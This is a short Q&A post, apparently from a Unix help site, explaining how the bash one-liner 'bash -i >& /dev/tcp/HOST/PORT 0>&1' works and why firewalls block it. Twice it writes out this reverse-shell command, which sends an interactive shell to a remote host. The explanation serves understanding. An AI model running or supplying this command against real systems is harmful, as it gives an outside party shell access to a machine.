Bash – Meaning of bash -i >& /dev/tcp/HOST/PORT 0>&1


I tried

bash -i >& /dev/tcp/HOST/PORT 0>&1

but it does not seem to work behind firewalls. What does this code actually do, which ports are forwarded and could it work behind firewalls?

Best Answer

This snippet runs a new interactive instance of bash (bash -i), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection (>& /dev/tcp/HOST/PORT), and standard input is read through this connection (0>&1 — this should be 0<&1 but 0>&1 works too).

There is no port forwarding going on. Obviously, a TCP server of some kind has to be listening and accepting connections on that HOST:PORT, and the firewall has to let the connection through.

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